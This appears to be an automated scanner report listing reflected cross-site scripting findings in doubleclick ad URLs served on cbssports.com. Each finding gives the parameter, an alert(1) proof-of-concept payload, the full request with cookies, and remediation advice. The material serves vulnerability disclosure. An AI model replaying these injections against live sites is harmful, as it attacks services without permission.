__gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26e3d"-alert(1)-"11d37b6a276 was submitted in the event parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=26e3d"-alert(1)-"11d37b6a276 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 524b6"-alert(1)-"8ae5f73bf70 was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn524b6"-alert(1)-"8ae5f73bf70&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f578"-alert(1)-"41bdc1636cb was submitted in the l parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US8f578"-alert(1)-"41bdc1636cb&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45614"-alert(1)-"a1b1ccad763 was submitted in the nd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=2240845614"-alert(1)-"a1b1ccad763&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 651ea"-alert(1)-"2bbb3a752bd was submitted in the o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a651ea"-alert(1)-"2bbb3a752bd&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b433b"-alert(1)-"a8247191af was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=b433b"-alert(1)-"a8247191af&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67e78"-alert(1)-"f7448d9e721 was submitted in the orh parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com67e78"-alert(1)-"f7448d9e721&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97493"-alert(1)-"ee5fa11b092 was submitted in the p parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=297493"-alert(1)-"ee5fa11b092&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12978"-alert(1)-"e22432d472d was submitted in the pdom parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com12978"-alert(1)-"e22432d472d&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65cd9"-alert(1)-"c00625812dd was submitted in the pg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ0865cd9"-alert(1)-"c00625812dd&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c9b5"-alert(1)-"3964ead4cbb was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=7c9b5"-alert(1)-"3964ead4cbb&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95dde"-alert(1)-"27c33359beb was submitted in the pp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=10095dde"-alert(1)-"27c33359beb&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55d6a"-alert(1)-"df904e7515b was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=55d6a"-alert(1)-"df904e7515b&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45027"-alert(1)-"b3054c498ad was submitted in the pt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=200145027"-alert(1)-"b3054c498ad&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbf0c"-alert(1)-"48df8c28707 was submitted in the ra parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243bbf0c"-alert(1)-"48df8c28707&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5235"-alert(1)-"df6b9809de9 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412f5235"-alert(1)-"df6b9809de9&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a7a4"-alert(1)-"f31f2c6fd97 was submitted in the sg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
